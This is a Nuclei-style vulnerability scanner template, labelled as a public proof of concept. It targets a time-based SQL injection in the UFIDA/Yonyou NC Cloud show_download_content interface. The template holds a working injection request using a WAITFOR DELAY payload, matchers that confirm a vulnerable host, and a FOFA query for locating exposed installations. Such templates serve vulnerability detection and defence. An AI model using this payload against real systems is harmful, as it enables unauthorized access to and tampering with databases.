The NC-Cloud system's show_download_content interface has a SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security.
PoC代码[已公开]
id: yonyou-ufida-cloud-sqli
info:
name: UFIDA NC Cloud - SQL Injection
author: s4e-io
severity: high
description: |
The NC-Cloud system's show_download_content interface has a SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security.
reference:
- https://blog.csdn.net/xc_214/article/details/141884644
metadata:
max-request: 1
verified: true
fofa-query: app="用友-NC-Cloud"
tags: time-based-sqli,sqli,yonyou,ufida,vuln
http:
- raw:
- |
@timeout 30s
GET /ebvp/infopub/show_download_content;.js?id=1';WAITFOR+DELAY+'0:0:6'-- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(tolower(body), "yonyou")'
condition: and
# digest: 490a0046304402201b4edc52919f2943afc5b87c09187c7c63bdaaf5fa1a9f64088aa6aeb15e521e0220151013fc21d34164348e9781e184ae3ccbeb60dd7a95d28bf31ea1433da0c77d:922c64590222798bb761d5b6d8e72950